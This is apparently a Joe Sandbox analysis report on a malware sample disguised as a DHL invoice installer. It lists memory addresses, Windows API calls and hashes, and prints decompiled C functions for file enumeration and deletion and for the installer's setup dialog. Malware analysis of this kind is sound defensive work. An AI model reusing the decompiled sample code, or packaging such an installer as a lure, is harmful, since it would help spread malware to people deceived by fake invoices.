0x6ef2239f
0x6ef223a3
0x6ef223ab
0x6ef223ab
0x6ef223af
0x00000000
0x00000000
0x6ef223b9
0x6ef223bc
0x6ef223c1
0x6ef223c5
0x6ef223c8
0x6ef22911
0x6ef22911
0x6ef22911
0x6ef22916
0x6ef22916
0x6ef2291a
0x6ef2291a
0x6ef2291d
0x6ef22940
0x6ef22943
0x6ef22945
0x6ef22966
0x6ef22966
0x6ef22947
0x6ef2294e
0x6ef22954
0x6ef22956
0x6ef22958
0x6ef2295e
0x6ef2295e
0x6ef2296a
0x6ef22970
0x6ef22970
0x6ef22973
0x6ef22979
0x6ef22979
0x6ef2297f
0x6ef22982
0x6ef22987
0x6ef22989
0x6ef2298c
0x6ef2298c
0x6ef2298e
0x6ef229b7
0x6ef229bb
0x00000000
0x00000000
0x6ef229be
0x6ef229c0
0x6ef229c6
0x6ef229cf
0x6ef229d2
0x6ef229d4
0x00000000
0x00000000
0x00000000
0x00000000
0x6ef229d6
0x6ef229d6
0x6ef229d6
0x6ef229dc
0x6ef229de
0x00000000
0x00000000
0x6ef229e0
0x6ef229e2
0x6ef229e2
0x6ef229e6
0x6ef229e8
0x6ef229ea
0x6ef229ea
0x6ef229ea
0x6ef229ea
0x6ef229f1
0x6ef229f7
0x6ef229f9
0x6ef22a0f
0x6ef22a10
0x6ef22a10
0x6ef22a12
0x6ef229fb
0x6ef22a01
0x6ef22a04
0x6ef22a04
0x00000000
0x6ef22990
0x6ef22990
0x6ef22990
0x6ef22993
0x6ef2299f
0x6ef229a4
0x6ef229aa
0x6ef229aa
0x6ef229ae
0x6ef229af
0x6ef229af
0x6ef22a18
0x6ef22a18
0x6ef22a1c
0x6ef22a1c
0x6ef22a20
0x6ef22a20
0x6ef22a24
0x6ef22a27
0x6ef22a2b
0x6ef22a2d
0x6ef22a34
0x00000000
0x00000000
0x00000000
0x6ef22a34
0x6ef22995
0x6ef22995
0x6ef22998
0x00000000
0x00000000
0x6ef2299a
0x6ef2299d
0x00000000
0x00000000
0x00000000
0x6ef2299d
0x6ef2298e
0x6ef2291f
0x6ef22922
0x6ef22928
0x6ef22930
0x6ef22932
0x6ef22932
0x6ef22933
0x6ef22933
0x00000000
0x6ef22922
0x6ef223ce
0x6ef223d1
0x6ef22502
0x6ef22506
0x6ef22522
0x6ef22526
0x6ef22526
0x6ef2252b
0x6ef224b8
0x6ef224ba
0x6ef224ba
0x6ef224bc
0x6ef22852
0x6ef22870
0x6ef22870
0x6ef22873
0x00000000
0x00000000
0x6ef22858
0x6ef2285b
0x6ef22860
0x6ef22864
0x6ef22866
0x6ef228a9
0x6ef228aa
0x6ef228ae
0x6ef228ae
0x6ef228b7
0x6ef228ba
0x6ef228bb
0x00000000
0x6ef228bb
0x6ef22868
0x6ef22868
0x6ef22868
0x6ef2286d
0x6ef2286d
0x6ef22875
0x6ef22878
0x6ef22907
0x6ef22908
0x00000000
0x6ef22908
0x6ef22880
0x6ef22881
0x6ef22883
0x6ef2288c
0x6ef2288c
0x6ef2288f
0x6ef22892
0x6ef228c2
0x6ef228c2
0x6ef228c7
0x6ef228c8
0x6ef228cb
0x00000000
0x00000000
0x6ef228cd
0x6ef228d0
0x00000000
0x00000000
0x6ef228d4
0x6ef228d5
0x6ef228d9
0x6ef228d9
0x6ef228db
0x6ef228df
0x6ef228e3
0x6ef228fd
0x00000000
0x6ef228fd
0x6ef228e5
0x6ef228eb
0x6ef228ef
0x00000000
0x6ef228ef
0x6ef22894
0x6ef22897
0x6ef2289b
0x00000000
0x00000000
0x6ef2289d
0x00000000
0x6ef2289d
0x6ef22887
0x6ef22888
0x6ef2288a
0x00000000
0x00000000
0x00000000
0x6ef2288a
0x6ef224c2
0x6ef224c2
0x6ef224c5
0x6ef225a7
0x6ef225ab
0x6ef225ab
0x6ef225ae
0x6ef225b1
0x00000000
0x00000000
0x6ef225b7
0x6ef225be
0x00000000
0x6ef2278d
0x6ef22791
0x6ef22795
0x6ef22797
0x6ef2279a
0x6ef2279b
0x6ef2279b
0x6ef2279e
0x6ef227a1
0x6ef227a4
0x00000000
0x00000000
0x6ef227a6
0x6ef227a6
0x6ef227aa
0x6ef227c3
0x6ef227c3
0x6ef227c7
0x6ef227c7
0x6ef227ca
0x6ef227ce
0x6ef227d7
0x00000000
0x6ef227d7
0x6ef227ac
0x6ef227ac
0x6ef227af
0x00000000
0x00000000
0x6ef227b1
0x6ef227b4
0x6ef227b6
0x6ef227b6
0x6ef227b6
0x6ef227b9
0x6ef227bc
0x6ef227bf
0x6ef2279b
0x6ef2279e
0x6ef227a1
0x6ef227a4
0x00000000
0x00000000
0x00000000
0x6ef227a4
0x00000000
0x6ef22593
0x6ef22596
0x00000000
0x00000000
0x6ef22618
0x00000000
0x00000000
0x6ef225ff
0x6ef22603
0x6ef22605
0x6ef22609
0x6ef2260a
0x6ef2260b
0x6ef2260f
0x00000000
0x00000000
0x6ef22757
0x6ef2275b
0x00000000
0x00000000
0x6ef22761
0x6ef22765
0x6ef22767
0x6ef22768
0x6ef2276a
0x6ef22773
0x6ef22775
0x6ef22779
0x6ef2277b
0x6ef22781
0x6ef22782
0x6ef22783
0x6ef22788
0x00000000
0x00000000
0x6ef22716
0x00000000
0x00000000
0x6ef22622
0x00000000
0x00000000
0x6ef227f8
0x00000000
0x00000000
0x6ef2262a
0x6ef2262c
0x6ef2262d
0x00000000
0x00000000
0x6ef227e8
0x00000000
0x00000000
0x6ef227ec
0x00000000
0x00000000
0x6ef227f4
0x00000000
0x00000000
0x6ef22676
0x6ef22676
0x6ef22678
0x00000000
0x00000000
0x6ef2263d
0x6ef2263f
0x6ef22640
0x00000000
0x00000000
0x6ef22650
0x6ef22652
0x6ef22653
0x00000000
0x00000000
0x6ef22688
0x6ef22688
0x6ef2268a
0x00000000
0x00000000
0x6ef2265c
0x6ef2265c
0x6ef2265e
0x00000000
0x00000000
0x6ef22665
0x00000000
0x00000000
0x6ef227f0
0x6ef227fa
0x6ef227fa
0x00000000
0x00000000
0x6ef2271f
0x6ef22724
0x6ef2272a
0x6ef2272c
0x6ef2272d
0x6ef22730
0x6ef22732
0x6ef22734
0x6ef22735
0x6ef22738
0x6ef22738
0x00000000
0x00000000
0x6ef227e3
0x00000000
0x00000000
0x6ef22669
0x6ef22669
0x6ef2266b
0x00000000
0x00000000
0x6ef22626
0x00000000
0x00000000
0x6ef2267f
0x6ef2267f
0x6ef22681
0x00000000
0x00000000
0x6ef225c5
0x6ef225d1
0x6ef225d3
0x6ef225d5
0x6ef225d8
0x6ef225dc
0x6ef225e0
0x6ef225e4
0x6ef225f0
0x6ef225f2
0x6ef225f3
0x6ef225f6
0x00000000
0x00000000
0x6ef22631
0x6ef22633
0x6ef22633
0x6ef22634
0x6ef22634
0x6ef22636
0x6ef22637
0x00000000
0x00000000
0x6ef2267b
0x6ef2267b
0x00000000
0x00000000
0x6ef22644
0x6ef22646
0x6ef22646
0x6ef22647
0x6ef22647
0x6ef22649
0x6ef2264a
0x00000000
0x00000000
0x6ef22657
0x6ef22659
0x00000000
0x00000000
0x6ef2268d
0x6ef2268d
0x00000000
0x00000000
0x6ef22661
0x6ef22661
0x00000000
0x00000000
0x6ef22747
0x6ef22752
0x6ef2273a
0x6ef2273a
0x6ef2273e
0x6ef227d9
0x6ef227d9
0x6ef227db
0x00000000
0x00000000
0x6ef227fb
0x6ef227fb
0x6ef22801
0x6ef22802
0x6ef22806
0x6ef22808
0x6ef22836
0x6ef22838
0x6ef2283a
0x6ef2283e
0x6ef2283e
0x6ef22841
0x6ef22841
0x6ef22848
0x6ef22848
0x6ef22849
0x00000000
0x6ef22849
0x6ef2280a
0x6ef2280e
0x6ef22811
0x6ef22818
0x6ef2281b
0x6ef22822
0x6ef22823
0x6ef22829
0x6ef2282d
0x6ef2282d
0x00000000
0x6ef2282d
0x6ef2281d
0x6ef22820
0x00000000
0x00000000
0x00000000
0x00000000
0x6ef2266e
0x6ef2266e
0x6ef22672
0x00000000
0x00000000
0x6ef22684
0x6ef22684
0x6ef2268f
0x6ef2268f
0x6ef22690
0x6ef22690
0x6ef22699
0x6ef2269a
0x6ef2269c
0x6ef2269f
0x6ef226a1
0x6ef226a2
0x6ef226a4
0x6ef226a8
0x6ef226ae
0x6ef226b2
0x6ef226b3
0x6ef226ba
0x6ef226be
0x6ef226c0
0x6ef226c3
0x6ef226c5
0x6ef226c6
0x6ef226c9
0x6ef226d0
0x6ef226d2
0x6ef226d4
0x6ef226d9
0x6ef226df
0x6ef226e3
0x6ef226e7
0x6ef226ea
0x6ef226ea
0x6ef226ee
0x6ef226f4
0x6ef226fb
0x6ef226fe
0x6ef22700
0x6ef22707
0x6ef2270e
0x00000000
0x00000000
0x00000000
0x00000000
0x6ef225be
0x6ef224cb
0x6ef224cb
0x6ef224ce
0x6ef2259f
0x6ef225a1
0x00000000
0x6ef225a1
0x6ef224d4
0x6ef224d7
0x00000000
0x00000000
0x6ef224dd
0x6ef224e0
0x6ef22556
0x6ef22556
0x6ef22559
0x6ef22573
0x6ef22575
0x6ef22575
0x6ef22576
0x6ef22576
0x6ef2257f
0x6ef22583
0x6ef2258b
0x6ef2258b
0x6ef22585
0x6ef22585
0x6ef22585
0x6ef2258d
0x00000000
0x6ef2258d
0x6ef2255b
0x6ef2255b
0x6ef2255e
0x6ef2256f
0x00000000
0x6ef2256f
0x6ef22562
0x6ef22563
0x6ef22565
0x00000000
0x00000000
0x6ef2256b
0x00000000
0x6ef2256b
0x6ef224e2
0x6ef22552
0x00000000
0x6ef22552
0x6ef224e4
0x6ef224e4
0x6ef224e7
0x6ef22549
0x00000000
0x6ef22549
0x6ef224e9
0x6ef224e9
0x6ef224ec
0x6ef22542
0x00000000
0x6ef22542
0x6ef224ee
0x6ef224ee
0x6ef224f1
0x6ef2253f
0x00000000
0x6ef2253f
0x6ef224f5
0x6ef224f6
0x6ef224f8
0x00000000
0x00000000
0x6ef224fe
0x00000000
0x6ef224fe
0x6ef2252d
0x6ef22532
0x6ef22534
0x00000000
0x6ef22534
0x6ef22508
0x6ef2250e
0x6ef2250f
0x6ef22516
0x6ef2251a
0x00000000
0x00000000
0x6ef2251c
0x6ef2251e
0x00000000
0x00000000
0x00000000
0x6ef22520
0x6ef223d7
0x6ef223da
0x6ef22441
0x6ef22446
0x6ef2244b
0x6ef22451
0x6ef22459
0x6ef22459
0x6ef2245a
0x6ef2245a
0x6ef22462
0x6ef22467
0x6ef2246b
0x6ef2246d
0x6ef22472
0x6ef2247a
0x6ef2247f
0x6ef22481
0x6ef22486
0x6ef2248c
0x6ef22492
0x6ef22495
0x6ef2249a
0x6ef2249f
0x6ef224a4
0x6ef224a4
0x6ef224ac
0x6ef224ae
0x00000000
0x00000000
0x6ef224b4
0x6ef224b4
0x00000000
0x6ef224b4
0x6ef223dc
0x6ef223df
0x6ef223fe
0x6ef22402
0x6ef22408
0x6ef2240d
0x6ef22415
0x6ef2241a
0x6ef2241c
0x6ef22421
0x6ef22427
0x6ef2242d
0x6ef22430
0x6ef22435
0x6ef2243a
0x00000000
0x6ef2243a
0x6ef223e4
0x00000000
0x6ef223ea
0x6ef223ec
0x6ef223f5
0x00000000
0x6ef223f5
0x6ef223e4
0x6ef22a44
0x6ef22a4a
0x6ef22a50
0x6ef22a54
0x6ef22bd0
0x6ef22bd9
0x6ef22a68
0x6ef22a6a
0x6ef22a6d
0x6ef22af7
0x6ef22af7
0x6ef22afa
0x6ef22afd
0x6ef22b1a
0x6ef22b20
0x6ef22b26
0x6ef22b28
0x6ef22b3f
0x6ef22b3f
0x6ef22b3f
0x6ef22b47
0x6ef22b4c
0x6ef22b54
0x6ef22b56
0x6ef22b5a
0x6ef22b5b
0x6ef22b5e
0x6ef22b60
0x6ef22b67
0x6ef22b6d
0x6ef22b6f
0x6ef22b71
0x6ef22b76
0x6ef22b88
0x6ef22b88
0x6ef22b76
0x6ef22b6f
0x6ef22b5e
0x6ef22b8e
0x6ef22b92
0x6ef22b9c
0x6ef22ba4
0x6ef22bb1
0x6ef22bb8
0x6ef22bba
0x6ef22bc4
0x6ef22bca
0x6ef22bca
0x00000000
0x00000000
0x6ef22bcc
0x6ef22bcc
0x6ef22bcc
0x6ef22bcc
0x00000000
0x6ef22bcc
0x6ef22bbc
0x6ef22bbc
0x00000000
0x6ef22b94
0x6ef22b94
0x6ef22b9a
0x00000000
0x00000000
0x00000000
0x6ef22b9a
0x6ef22b92
0x6ef22b2b
0x6ef22b31
0x6ef22b37
0x6ef22b39
0x00000000
0x00000000
0x00000000
0x6ef22b39
0x6ef22aff
0x6ef22b06
0x6ef22b0c
0x6ef22b12
0x00000000
0x6ef22b12
0x6ef22a73
0x6ef22a76
0x6ef22adc
0x6ef22adc
0x6ef22ae2
0x6ef22ae5
0x00000000
0x00000000
0x6ef22aeb
0x6ef22aec
0x00000000
0x6ef22af1
0x6ef22a7b
0x00000000
0x00000000
0x6ef22a81
0x6ef22a81
0x6ef22a84
0x6ef22a8a
0x6ef22a8c
0x6ef22a95
0x00000000
0x00000000
0x6ef22a9c
0x6ef22aa7
0x6ef22ab0
0x6ef22ab6
0x6ef22abc
0x6ef22ac2
0x6ef22ad5
0x00000000
0x6ef22ad5

APIs

Part of subcall function 6EF212F8: GlobalAlloc.KERNELBASE(00000040,?,6EF211C4,-000000A0), ref: 6EF21302

GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 6EF2294E
lstrcpyW.KERNEL32(00000008,?), ref: 6EF229A4
lstrcpyW.KERNEL32(00000808,?), ref: 6EF229AF
GlobalFree.KERNEL32(00000000), ref: 6EF229C0
GlobalFree.KERNEL32(?), ref: 6EF22A44
GlobalFree.KERNEL32(?), ref: 6EF22A4A
GlobalFree.KERNEL32(?), ref: 6EF22A50
GetModuleHandleW.KERNEL32(00000008), ref: 6EF22B1A
LoadLibraryW.KERNEL32(00000008), ref: 6EF22B2B
GetProcAddress.KERNEL32(?,?), ref: 6EF22B82
lstrlenW.KERNEL32(00000808), ref: 6EF22B9D

Memory Dump Source

Source File: 00000000.00000002.11492715606.000000006EF21000.00000020.00000001.01000000.00000004.sdmp, Offset: 6EF20000, based on PE: true

Associated: 00000000.00000002.11492664043.000000006EF20000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.11492760898.000000006EF24000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.11492804171.000000006EF26000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ef20000_DHL_#U53d1#U7968.jbxd

Similarity

API ID: Global$Free$Alloclstrcpy$AddressHandleLibraryLoadModuleProclstrlen
String ID:
API String ID: 1042148487-0
Opcode ID: c72175573d7703d6830b89b042b96bd55b2a26ec14e15d717307db51850f3fbb
Instruction ID: 068ae8ea87b408e01b81860b42d46bf864b605a96d4b0977cc474012ed202959
Opcode Fuzzy Hash: c72175573d7703d6830b89b042b96bd55b2a26ec14e15d717307db51850f3fbb
Instruction Fuzzy Hash: D142D472A683029FE358DFF9846075AB7E4FF89310F408A3EE499D7244E772D5448B92

Uniqueness

Uniqueness Score: -1.00%

Function 00406719 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 155
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E00406719(void* __eflags, WCHAR* _a4, signed char _a8) {
				short _v544;
				short _v546;
				struct _WIN32_FIND_DATAW _v592;
				signed int _v596;
				signed char _v600;
				signed int _v604;
				signed int _t27;
				void* _t40;
				signed int _t43;
				signed int _t46;
				signed int _t54;
				void* _t56;
				signed char _t57;
				signed int _t60;
				WCHAR* _t61;
				signed int _t64;
				void* _t66;

				_t57 = _a8;
				_t61 = _a4;
				_t60 = _t57 & 0x00000004;
				_t27 = E00406638(__eflags, _t61);
				_v600 = _t27;
				if((_t57 & 0x00000008) != 0) {
					_t54 = DeleteFileW(_t61); // executed
					asm("sbb eax, eax");
					_t56 =  ~_t54 + 1;
					 *0x435ac8 =  *0x435ac8 + _t56;
					return _t56;
				}
				_t64 = _t57 & 0x00000001;
				__eflags = _t64;
				_v600 = _t64;
				if(_t64 == 0) {
					L5:
					E00406B1A(0x42fdc0, _t61);
					__eflags = _t64;
					if(_t64 == 0) {
						E00406D10(_t61);
					} else {
						lstrcatW(0x42fdc0, L"\\*.*");
					}
					__eflags =  *_t61;
					if( *_t61 != 0) {
						L10:
						lstrcatW(_t61, 0x4092b0);
						goto L11;
					} else {
						__eflags =  *0x42fdc0 - 0x5c;
						if( *0x42fdc0 != 0x5c) {
							L11:
							_v604 =  &(_t61[lstrlenW(_t61)]);
							_t27 = FindFirstFileW(0x42fdc0,  &_v592);
							_t66 = _t27;
							__eflags = _t66 - 0xffffffff;
							if(_t66 == 0xffffffff) {
								L27:
								__eflags = _v600;
								if(_v600 == 0) {
									goto L35;
								}
								_t27 = _v604;
								 *((short*)(_t27 - 2)) = 0;
								__eflags = _v596;
								if(_v596 == 0) {
									goto L33;
								}
								goto L29;
							}
							_t40 = 0x2e;
							do {
								__eflags = _v592.cFileName - _t40;
								if(_v592.cFileName != _t40) {
									L17:
									E00406B1A(_v604,  &(_v592.cFileName));
									__eflags = _v600 & 0x00000010;
									if(__eflags == 0) {
										_t43 = E00406585(__eflags, _t61, _t60);
										__eflags = _t43;
										if(_t43 != 0) {
											E00405D3A(0xfffffff2, _t61);
										} else {
											__eflags = _t60;
											if(_t60 == 0) {
												 *0x435ac8 =  *0x435ac8 + 1;
											} else {
												E00405D3A(0xfffffff1, _t61);
												E0040623D(_t61, 0);
											}
										}
									} else {
										__eflags = (_t57 & 0x00000003) - 3;
										if(__eflags == 0) {
											E00406719(__eflags, _t61, _t57);
										}
									}
									goto L25;
								}
								__eflags = _v546;
								if(_v546 == 0) {
									goto L25;
								}
								__eflags = _v546 - _t40;
								if(_v546 != _t40) {
									goto L17;
								}
								__eflags = _v544;
								if(_v544 == 0) {
									goto L25;
								}
								goto L17;
								L25:
								_t46 = FindNextFileW(_t66,  &_v592);
								__eflags = _t46;
								_t40 = 0x2e;
							} while (_t46 != 0);
							_t27 = FindClose(_t66);
							goto L27;
						}
						goto L10;
					}
				} else {
					__eflags = _t27;
					if(_t27 == 0) {
						L33:
						 *0x435ac8 =  *0x435ac8 + 1;
						L35:
						return _t27;
					}
					__eflags = _t57 & 0x00000002;
					if((_t57 & 0x00000002) == 0) {
						L29:
						_t27 = E004065CF(_t61);
						__eflags = _t27;
						if(_t27 == 0) {
							goto L35;
						}
						E00406556(_t61);
						_t27 = E00406585(__eflags, _t61, _t60 | 0x00000001);
						__eflags = _t27;
						if(_t27 != 0) {
							_t27 = E00405D3A(0xffffffe5, _t61);
							goto L35;
						}
						__eflags = _t60;
						if(_t60 == 0) {
							goto L33;
						}
						E00405D3A(0xfffffff1, _t61);
						_t27 = E0040623D(_t61, 0);
						goto L35;
					}
					goto L5;
				}
			}

0x00406720
0x00406728
0x00406733
0x00406736
0x0040673b
0x00406742
0x00406745
0x0040674d
0x0040674f
0x00406750
0x00000000
0x00406750
0x0040675e
0x0040675e
0x00406761
0x00406765
0x00406778
0x0040677e
0x00406783
0x0040678b
0x0040679c
0x0040678d
0x00406797
0x00406797
0x004067a3
0x004067a6
0x004067b2
0x004067b8
0x00000000
0x004067a8
0x004067a8
0x004067b0
0x004067ba
0x004067c4
0x004067d2
0x004067d8
0x004067da
0x004067dd
0x0040687b
0x0040687b
0x00406880
0x00000000
0x00000000
0x00406882
0x00406888
0x0040688c
0x00406890
0x00000000
0x00000000
0x00000000
0x00406890
0x004067e5
0x004067e6
0x004067e6
0x004067eb
0x00406804
0x0040680d
0x00406812
0x00406817
0x0040682d
0x00406832
0x00406834
0x00406858
0x00406836
0x00406836
0x00406838
0x0040684d
0x0040683a
0x0040683d
0x00406846
0x00406846
0x00406838
0x00406819
0x0040681e
0x00406820
0x00406824
0x00406824
0x00406820
0x00000000
0x00406817
0x004067ed
0x004067f3
0x00000000
0x00000000
0x004067f5
0x004067fa
0x00000000
0x00000000
0x004067fc
0x00406802
0x00000000
0x00000000
0x00000000
0x0040685d
0x00406863
0x0040686b
0x0040686d
0x0040686d
0x00406875
0x00000000
0x00406875
0x00000000
0x004067b0
0x00406767
0x00406767
0x00406769
0x004068c9
0x004068c9
0x004068d9
0x00000000
0x004068d9
0x0040676f
0x00406772
0x00406892
0x00406893
0x00406898
0x0040689a
0x00000000
0x00000000
0x0040689d
0x004068a9
0x004068ae
0x004068b0
0x004068d4
0x00000000
0x004068d4
0x004068b2
0x004068b4
0x00000000
0x00000000
0x004068b9
0x004068c2
0x00000000
0x004068c2
0x00000000
0x00406772

APIs

Part of subcall function 00406638: lstrlenW.KERNEL32(004305C0,00000000,004305C0,004305C0,00000000,?,?,0040673B,?,00000000,76383420,?), ref: 0040668C
Part of subcall function 00406638: GetFileAttributesW.KERNEL32(004305C0,004305C0), ref: 0040669D

DeleteFileW.KERNELBASE(?,?,00000000,76383420,?), ref: 00406745
lstrcatW.KERNEL32(0042FDC0,\*.*), ref: 00406797
lstrcatW.KERNEL32(?,004092B0), ref: 004067B8
lstrlenW.KERNEL32(?), ref: 004067BB
FindFirstFileW.KERNEL32(0042FDC0,?), ref: 004067D2
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?), ref: 00406863
FindClose.KERNEL32(00000000), ref: 00406875

Strings

\*.*, xrefs: 0040678D

Memory Dump Source

Source File: 00000000.00000002.11457610037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11457556627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457683931.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11458191200.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL_#U53d1#U7968.jbxd

Similarity

API ID: File$Find$lstrcatlstrlen$AttributesCloseDeleteFirstNext
String ID: \*.*
API String ID: 2636146433-1173974218
Opcode ID: ec35ec8144d1065000fb23a15f3631645bd2442b6bc3530db3f1337977a5d6e6
Instruction ID: dccc3e871a12a5ab9d695c44a96518fee9cafe6829caada924bdb8552f231abd
Opcode Fuzzy Hash: ec35ec8144d1065000fb23a15f3631645bd2442b6bc3530db3f1337977a5d6e6
Instruction Fuzzy Hash: 084106322067116AD7207B259C49A6B73A8EF41318F16893FF943F21D1E73C8D6586AF

Uniqueness

Uniqueness Score: -1.00%

Function 004065CF Relevance: 3.0, APIs: 2, Instructions: 14
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004065CF(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x4321c0); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2); // executed
				return 0x4321c0;
			}

0x004065da
0x004065e3
0x00000000
0x004065f0
0x004065e6
0x00000000

APIs

FindFirstFileW.KERNELBASE(00000000,004321C0,00000000,0040667C,004305C0), ref: 004065DA
FindClose.KERNELBASE(00000000), ref: 004065E6

Memory Dump Source

Source File: 00000000.00000002.11457610037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11457556627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457683931.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11458191200.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL_#U53d1#U7968.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: d9e00b7f11b8670b58f1de5a54c434da9086a4a904ca4075b7418d89ed5cb961
Instruction ID: 9bce445b90ad5ff1b83c175b3b927286731ee1a5929a82a3f0dae3cb9bd988e9
Opcode Fuzzy Hash: d9e00b7f11b8670b58f1de5a54c434da9086a4a904ca4075b7418d89ed5cb961
Instruction Fuzzy Hash: 64D012756051316BD70057787E0CC8B7F699F05330F158A36B066F11F5D7748C6196AC

Uniqueness

Uniqueness Score: -1.00%

Function 00404F92 Relevance: 63.4, APIs: 35, Strings: 1, Instructions: 374
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E00404F92(struct HWND__* _a4, int _a8, signed int _a12, long _a16) {
				signed int _v32;
				struct HWND__* _v40;
				void* _v84;
				void* _v88;
				signed int _t51;
				signed int _t53;
				intOrPtr _t55;
				struct HWND__* _t58;
				signed int _t67;
				int _t77;
				struct HWND__* _t113;
				struct HWND__* _t137;
				signed int _t139;
				signed int _t140;
				signed int _t141;
				struct HWND__* _t142;
				signed int _t143;
				long _t146;
				int _t149;
				struct HWND__* _t156;
				void* _t159;

				_t137 = _a4;
				_t143 = _a8;
				if(_t143 == 0x110 || _t143 == 0x408) {
					_t139 = _a12;
					 *0x42dd48 = _t139;
					if(_t143 == 0x110) {
						 *0x4349f8 = _t137;
						 *0x42dd54 = GetDlgItem(_t137, 1);
						_t113 = GetDlgItem(_t137, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x42dd58 = _t113;
						E0040551A(_t137);
						SetClassLongW(_t137, 0xfffffff2,  *0x4349d8);
						 *0x4349ec = E00401533(4);
						_t139 = 1;
						 *0x42dd48 = 1;
					}
					_t51 =  *0x40b014; // 0x0
					_t146 = (_t51 << 6) +  *0x435a20;
					if(_t51 < 0) {
						L38:
						E004054E8(0x40b);
						while(1) {
							_t140 =  *0x40b014; // 0x0
							_t53 =  *0x42dd48;
							_t141 = _t140 + _t53;
							_t146 = _t146 + (_t53 << 6);
							 *0x40b014 = _t141;
							_t55 =  *0x435a24;
							if(_t141 == _t55) {
								E00401533(1);
								_t55 =  *0x435a24;
								_t141 =  *0x40b014; // 0x0
							}
							if( *0x4349ec != 0 || _t141 >= _t55) {
								break;
							}
							_push( *((intOrPtr*)(_t146 + 0x24)));
							_push(0x445000);
							_a12 =  *((intOrPtr*)(_t146 + 0x14));
							E00405EBA();
							_push( *((intOrPtr*)(_t146 + 0x20)));
							_push(0xfffffc19);
							E0040551A(_t137);
							_push( *((intOrPtr*)(_t146 + 0x1c)));
							_push(0xfffffc1b);
							E0040551A(_t137);
							_push( *((intOrPtr*)(_t146 + 0x28)));
							_push(0xfffffc1a);
							E0040551A(_t137);
							_t142 = GetDlgItem(_t137, 3);
							_t67 = _v32;
							_v40 = _t142;
							if( *0x435acc != 0) {
								_t67 = _t67 & 0xfffffefd | 0x00000004;
								 *(_t159 + 0x2c) = _t67;
							}
							ShowWindow(_t142, _t67 & 0x00000008); // executed
							EnableWindow( *(_t159 + 0x28),  *(_t159 + 0x2c) & 0x00000100); // executed
							EnableWindow( *0x42dd54,  *(_t159 + 0x2c) & 0x00000002); // executed
							_t77 =  *(_t159 + 0x2c) & 0x00000004;
							 *(_t159 + 0x34) = _t77;
							EnableWindow( *0x42dd58, _t77);
							if( *(_t159 + 0x2c) == 0) {
								_push(1);
							} else {
								_push(0);
							}
							EnableMenuItem(GetSystemMenu(_t137, 0), 0xf060, ??);
							SendMessageW( *(_t159 + 0x30), 0xf4, 0, 1);
							if( *0x435acc == 0) {
								_push( *0x42dd54);
							} else {
								SendMessageW(_t137, 0x401, 2, 0);
								_push( *0x42dd58);
							}
							E00405503();
							E00406B1A("Preblesses Setup: Installing", E00405D1B());
							_push( *((intOrPtr*)(_t146 + 0x18)));
							_push(0x42bd48 + lstrlenW("Preblesses Setup: Installing") * 2);
							E00405EBA();
							SetWindowTextW(_t137, "Preblesses Setup: Installing"); // executed
							_push(0);
							if(E00401399( *((intOrPtr*)(_t146 + 8))) != 0 ||  *_t146 == 0) {
								continue;
							} else {
								if( *(_t146 + 4) != 5) {
									DestroyWindow( *0x4349dc); // executed
									 *0x42dd4c = _t146;
									if( *_t146 <= 0) {
										L62:
										_t58 =  *0x4349dc;
										goto L63;
									}
